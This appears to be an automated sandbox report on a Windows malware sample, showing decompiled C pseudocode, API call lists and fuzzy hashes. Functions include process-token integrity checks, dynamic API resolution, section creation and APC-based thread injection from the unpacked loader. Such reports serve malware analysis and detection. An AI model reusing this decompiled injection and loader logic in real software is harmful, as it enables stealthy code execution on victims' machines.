Part of subcall function 00F93946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F939E9
Part of subcall function 00F93946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00F939FD
Part of subcall function 00F93946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00F93A0A
Part of subcall function 00F93946: HeapFree.KERNEL32(00000000,00000000), ref: 00F93A28

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 09648fb52ec58d0dece5655a744cdb8bec3fc909324befbffbe1411edd046a0a
Instruction ID: 7953b9681454b7e239d8fbf7798636e30c3f7739257139670a51c0e61db6ccfd
Opcode Fuzzy Hash: 09648fb52ec58d0dece5655a744cdb8bec3fc909324befbffbe1411edd046a0a
Instruction Fuzzy Hash: 91510271E00218BBFF61EBA8DC85FAE73B8AB04724F110156F904E7260D7759D44BBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F91041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F91041(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xf9a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00F95C4E(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00F92A03(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00f9104e
0x00f91055
0x00f9105c
0x00f91070
0x00f9107b
0x00f91093
0x00f910a0
0x00f910a3
0x00f910a8
0x00f910b3
0x00f910b7
0x00f910c6
0x00f910ca
0x00f910e6
0x00f910e6
0x00f910ea
0x00f910ea
0x00f910ef
0x00f910f3
0x00f910f9
0x00f910fa
0x00f91101
0x00f91107

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00F91073
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00F91093
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00F910A3
CloseHandle.KERNEL32(00000000), ref: 00F910F3

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00F910C6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00F910CE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00F910DE

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 68fe2bc941889a84db095c339aef9a35e4bca79ef5ca8e594247cb1e488295fc
Instruction ID: 4a298227d3574ee3a2c1c078baf7ac2035baf116f52aa6790ca87fb20e9952b6
Opcode Fuzzy Hash: 68fe2bc941889a84db095c339aef9a35e4bca79ef5ca8e594247cb1e488295fc
Instruction Fuzzy Hash: A6215C7590024EFFEF119FA5CC44EEEBBB9FB04314F000066E510A2261DB764A54EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F95AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00F95AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xf9a2d0; // 0x310d5a8
				_t1 = _t9 + 0xf9b61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00F947BA(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x40a9631
					_t40 = E00F95C4E(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00F91AF1(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00F92A03(_t40);
						_t42 = E00F9332F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00F92A03(_t36);
							_t36 = _t42;
						}
						_t43 = E00F94138(_t36, _t33);
						if(_t43 != 0) {
							E00F92A03(_t36);
							_t36 = _t43;
						}
					}
					E00F92A03(_t28);
				}
				return _t36;
			}

0x00f95ae3
0x00f95ae6
0x00f95ae7
0x00f95aee
0x00f95af5
0x00f95afc
0x00f95b00
0x00f95b07
0x00f95b0e
0x00f95b13
0x00f95b1b
0x00f95b25
0x00f95b29
0x00f95b2d
0x00f95b33
0x00f95b38
0x00f95b42
0x00f95b48
0x00f95b4a
0x00f95b61
0x00f95b65
0x00f95b68
0x00f95b6d
0x00f95b6d
0x00f95b76
0x00f95b7a
0x00f95b7d
0x00f95b82
0x00f95b82
0x00f95b7a
0x00f95b85
0x00f95b8a
0x00f95b90

APIs

Part of subcall function 00F947BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00F95AFC,253D7325,00000000,00000000,?,00000000,00F96301), ref: 00F94821
Part of subcall function 00F947BA: sprintf.NTDLL ref: 00F94842

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F95B0E
lstrlen.KERNEL32(00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F95B16

Part of subcall function 00F95C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00F93FAA), ref: 00F95C5A

strcpy.NTDLL ref: 00F95B2D
lstrcat.KERNEL32(00000000,00000000), ref: 00F95B38

Part of subcall function 00F91AF1: lstrlen.KERNEL32(00000000,00000000,00F96301,00000000,?,00F95B47,00000000,00F96301,?,00000000,00F96301,00000000,040A9630), ref: 00F91B02

Part of subcall function 00F92A03: RtlFreeHeap.NTDLL(00000000,00000000,00F94072,00000000,?,?,00000000,?,?,?,?,?,?,00F944AE,00000000), ref: 00F92A0F

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F96301,?,00000000,00F96301,00000000,040A9630), ref: 00F95B55

Part of subcall function 00F9332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00F95B61,00000000,?,00000000,00F96301,00000000,040A9630), ref: 00F93339
Part of subcall function 00F9332F: _snprintf.NTDLL ref: 00F93397

Strings

=, xrefs: 00F95B4F

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: ea26ab5245569e48728c210ad79c5d48bdbee39de057e804ed8576014b723bfd
Instruction ID: 8456542df048963b424197fb920573514c912b139084588ee84a8ee582cdff33
Opcode Fuzzy Hash: ea26ab5245569e48728c210ad79c5d48bdbee39de057e804ed8576014b723bfd
Instruction Fuzzy Hash: C111C6339016257B6F237B789C85CAE369D9F85B647090116F500AB201DF7CDD0277E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F91671, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00F916B2
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00F91734
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00F91773
SysFreeString.OLEAUT32(00000000), ref: 00F91795

Part of subcall function 00F913B4: SysAllocString.OLEAUT32(00F992D0), ref: 00F91404

SafeArrayDestroy.OLEAUT32(?), ref: 00F917E9
SysFreeString.OLEAUT32(?), ref: 00F917F7

Part of subcall function 00F95872: Sleep.KERNELBASE(000001F4), ref: 00F958BA

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 50f454e13ce9feaa379cdaede56f441021a5f1dc97c2d4df12a25f1c870c0965
Instruction ID: 98202b7a78ff317a5763fb3e1dc291946107a15e5e8e6c10199b3f603311808a
Opcode Fuzzy Hash: 50f454e13ce9feaa379cdaede56f441021a5f1dc97c2d4df12a25f1c870c0965
Instruction Fuzzy Hash: 86512B3690020EAFDF01DFE8C8848AEB7B6FF88310B158939E515EB220D735AD45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10001AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10001C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x100041d0 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x100041d0 + 0x100050e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E1000136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x100041d0 + 0x100050f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x100041d0 + 0x10005104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x100041d0 + 0x10005119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x100041d0 + 0x1000512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E100018D1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x10001ab3
0x10001ab7
0x10001b78
0x10001abd
0x10001ad5
0x10001ae4
0x10001aeb
0x10001aef
0x10001af2
0x10001b70
0x10001b71
0x10001af4
0x10001b01
0x10001b05
0x10001b08
0x00000000
0x10001b0a
0x10001b17
0x10001b1b
0x10001b1e
0x00000000
0x10001b20
0x10001b2d
0x10001b31
0x10001b34
0x00000000
0x10001b36
0x10001b43
0x10001b47
0x10001b4a
0x00000000
0x10001b4c
0x10001b52
0x10001b58
0x10001b5d
0x10001b64
0x10001b67
0x00000000
0x10001b69
0x10001b6c
0x10001b6c
0x10001b67
0x10001b4a
0x10001b34
0x10001b1e
0x10001b08
0x10001af2
0x10001b86

APIs

Part of subcall function 10001C8F: HeapAlloc.KERNEL32(00000000,?,1000117D,?,00000000,00000000,?,?,?,10001810), ref: 10001C9B

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001272,?,?,?,?), ref: 10001AC9
GetProcAddress.KERNEL32(00000000,?), ref: 10001AEB
GetProcAddress.KERNEL32(00000000,?), ref: 10001B01
GetProcAddress.KERNEL32(00000000,?), ref: 10001B17
GetProcAddress.KERNEL32(00000000,?), ref: 10001B2D
GetProcAddress.KERNEL32(00000000,?), ref: 10001B43

Part of subcall function 100018D1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 1000192E
Part of subcall function 100018D1: memset.NTDLL ref: 10001950

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: af5956ae6be44314a5df01ddd2a8e1fe29d23dd5da3ef23eacc272961148a90f
Instruction ID: d63599c59f16d2ccc43b5ec6806980ba7913547d508375ee0a4e4cbc4ad42cbf
Opcode Fuzzy Hash: af5956ae6be44314a5df01ddd2a8e1fe29d23dd5da3ef23eacc272961148a90f
Instruction Fuzzy Hash: D8211DF190431A9FE750DF69CC80E9B77ECEB486C4B024566F905C7269EB31ED018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 10001E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000418c;
						if( *0x1000418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004198;
								if( *0x10004198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000418c);
						}
						HeapDestroy( *0x10004190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x10004190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x100041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E10001CA4(E10001D32, E10001EE0(_a12, 1, 0x10004198, _t41));
							 *0x1000418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x10001e07
0x10001e13
0x10001e15
0x10001e18
0x10001e8e
0x10001e94
0x10001e96
0x10001e98
0x10001e9e
0x10001ea0
0x10001ea5
0x10001ea8
0x10001eb3
0x10001eb5
0x00000000
0x00000000
0x10001eb7
0x10001eba
0x10001ebc
0x00000000
0x00000000
0x00000000
0x10001ebc
0x10001ec4
0x10001ec4
0x10001ed0
0x10001ed0
0x10001e1a
0x10001e1b
0x10001e3b
0x10001e41
0x10001e43
0x10001e48
0x10001e84
0x10001e84
0x10001e4a
0x10001e52
0x10001e59
0x10001e63
0x10001e6f
0x10001e76
0x10001e7b
0x10001e80
0x00000000
0x10001e80
0x10001e7b
0x10001e48
0x10001e1b
0x10001edd

APIs

InterlockedIncrement.KERNEL32(10004188), ref: 10001E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001E3B

Part of subcall function 10001CA4: CreateThread.KERNEL32 ref: 10001CBB
Part of subcall function 10001CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001CD0
Part of subcall function 10001CA4: GetLastError.KERNEL32(00000000), ref: 10001CDB
Part of subcall function 10001CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 10001CE5
Part of subcall function 10001CA4: CloseHandle.KERNEL32(00000000), ref: 10001CEC
Part of subcall function 10001CA4: SetLastError.KERNEL32(00000000), ref: 10001CF5

InterlockedDecrement.KERNEL32(10004188), ref: 10001E8E
SleepEx.KERNEL32(00000064,00000001), ref: 10001EA8
CloseHandle.KERNEL32 ref: 10001EC4
HeapDestroy.KERNEL32 ref: 10001ED0

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 19457271cb858ac661add039b55f590c8dab6e10940bb86993ce01263234bb52
Instruction ID: 22b08fd1564e3c44917bda70764785d62cea463007abdf7386b51d2c5f0b3438
Opcode Fuzzy Hash: 19457271cb858ac661add039b55f590c8dab6e10940bb86993ce01263234bb52
Instruction Fuzzy Hash: 8C2160B1A01255EBF701DFA9DCC4ADE7BECFB592E07524129FA05D3158EB309D408B64

Uniqueness

Uniqueness Score: -1.00%

Function 10001CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x100041cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x10001cbb
0x10001cc1
0x10001cc5
0x10001cd0
0x10001cd8
0x10001ce1
0x10001ce5
0x10001cec
0x10001cf3
0x10001cf5
0x10001cfb
0x10001cd8
0x10001cff

APIs

CreateThread.KERNEL32 ref: 10001CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001CD0
GetLastError.KERNEL32(00000000), ref: 10001CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 10001CE5
CloseHandle.KERNEL32(00000000), ref: 10001CEC
SetLastError.KERNEL32(00000000), ref: 10001CF5

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 6d1cd5c6a974930989a8ae65fc166bbbd3ee74a09a644123e2c542902ed632c2
Instruction ID: aecf462274e4e2916ae65de04f71fabe7fe1494f4b7b1e115c31076b21763587
Opcode Fuzzy Hash: 6d1cd5c6a974930989a8ae65fc166bbbd3ee74a09a644123e2c542902ed632c2
Instruction Fuzzy Hash: 11F01C36646631BBF3135BA08C9CF9BBFADFB097D1F018415FA0991169CB2188129BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F94A3C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F94A3C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00F94380(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xf9a2d0; // 0x310d5a8
				_t4 = _t24 + 0xf9bd90; // 0x40a9338
				_t5 = _t24 + 0xf9bd38; // 0x4f0053
				_t26 = E00F930AD( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xf9a2d0; // 0x310d5a8
						_t11 = _t32 + 0xf9bd84; // 0x40a932c
						_t48 = _t11;
						_t12 = _t32 + 0xf9bd38; // 0x4f0053
						_t55 = E00F94DC8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0xf9a2d0; // 0x310d5a8
							_t13 = _t35 + 0xf9bdce; // 0x30314549
							if(E00F95EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0xf9a2b4 - 6;
								if( *0xf9a2b4 <= 6) {
									_t42 =  *0xf9a2d0; // 0x310d5a8
									_t15 = _t42 + 0xf9bbda; // 0x52384549
									E00F95EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0xf9a2d0; // 0x310d5a8
							_t17 = _t38 + 0xf9bdc8; // 0x40a9370
							_t18 = _t38 + 0xf9bda0; // 0x680043
							_t45 = E00F933B7(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0xf9a290, 0, _t55);
						}
					}
					HeapFree( *0xf9a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00F93EFA(_t54);
				}
				return _t45;
			}

0x00f94a3c
0x00f94a4c
0x00f94a4f
0x00f94a56
0x00f94a58
0x00f94a58
0x00f94a5b
0x00f94a60
0x00f94a67
0x00f94a74
0x00f94a79
0x00f94a7d
0x00f94a8b
0x00f94a99
0x00f94a9d
0x00f94b2e
0x00f94b2e
0x00f94aa3
0x00f94aa3
0x00f94aa8
0x00f94aa8
0x00f94aaf
0x00f94abb
0x00f94abd
0x00f94abf
0x00f94ac1
0x00f94ac8
0x00f94ada
0x00f94adc
0x00f94ae3
0x00f94ae5
0x00f94aec
0x00f94af7
0x00f94af7
0x00f94ae3
0x00f94afc
0x00f94b01
0x00f94b08
0x00f94b26
0x00f94b28
0x00f94b28
0x00f94abf
0x00f94b3a
0x00f94b3a
0x00f94b3c
0x00f94b41
0x00f94b43
0x00f94b43
0x00f94b4e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,040A9338,00000000,?,74E5F710,00000000,74E5F730), ref: 00F94A8B
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,040A9370,?,00000000,30314549,00000014,004F0053,040A932C), ref: 00F94B28
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00F91BD5), ref: 00F94B3A

Strings

Ut, xrefs: 00F94A91

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: b870caf28285d939f1c81dfcef8ffed605a3ac453993cea6a91cddddc929f1d5
Instruction ID: 57789d41b4815b8e9e080b68e74cf957fa82940c3c3c28b2839bfc66f5018b0f
Opcode Fuzzy Hash: b870caf28285d939f1c81dfcef8ffed605a3ac453993cea6a91cddddc929f1d5
Instruction Fuzzy Hash: C931AF3290010CBFEF11EB95ED85EAA7BBCEF94710F150096F605A7061D771AA09FBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F9243C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00F9243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				void* _t36;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0xf9a2d0; // 0x310d5a8
				_t2 = _t22 + 0xf9b671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0xf9a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xf9a2a4 =  *0xf9a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E00F93F12(_t49, _t48); // executed
					_t33 = E00F945E6(_t46, _t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0xf9a2a4 < 5) {
							 *0xf9a2a4 =  *0xf9a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00F92813();
					RtlFreeHeap( *0xf9a290, 0, _t48); // executed
					goto L9;
				}
				_t50 =  *0xf9a390; // 0x40a8d6c
				_t36 = RtlAllocateHeap( *0xf9a290, 0, 0x800); // executed
				if(_t36 == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E00F96DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x00f9243c
0x00f92443
0x00f9244a
0x00f9244e
0x00f92453
0x00f9245e
0x00f9246e
0x00f924b1
0x00f924b5
0x00f924b9
0x00f924ba
0x00f924bd
0x00f924c2
0x00f924c2
0x00f924c5
0x00f924c9
0x00f92503
0x00f92503
0x00f92509
0x00f92510
0x00f92510
0x00f924cb
0x00f924ce
0x00f924d0
0x00f924dd
0x00f924df
0x00f924e6
0x00f9251d
0x00f92522
0x00f92524
0x00f92526
0x00f92526
0x00000000
0x00f92524
0x00f924e8
0x00f924ef
0x00f924fd
0x00000000
0x00f924fd
0x00f92470
0x00f92483
0x00f9248b
0x00f924a5
0x00000000
0x00f924a5
0x00f9249e
0x00000000

APIs

wsprintfA.USER32 ref: 00F9245E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F92483

Part of subcall function 00F96DB7: GetTickCount.KERNEL32 ref: 00F96DCE
Part of subcall function 00F96DB7: wsprintfA.USER32 ref: 00F96E1B
Part of subcall function 00F96DB7: wsprintfA.USER32 ref: 00F96E38
Part of subcall function 00F96DB7: wsprintfA.USER32 ref: 00F96E58
Part of subcall function 00F96DB7: wsprintfA.USER32 ref: 00F96E76
Part of subcall function 00F96DB7: wsprintfA.USER32 ref: 00F96E99
Part of subcall function 00F96DB7: wsprintfA.USER32 ref: 00F96EBA

RtlFreeHeap.NTDLL(00000000,00F91C1F,?,?,00F91C1F,?), ref: 00F924FD

Strings

Ut, xrefs: 00F924FD

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID: Ut
API String ID: 2794511967-8415677
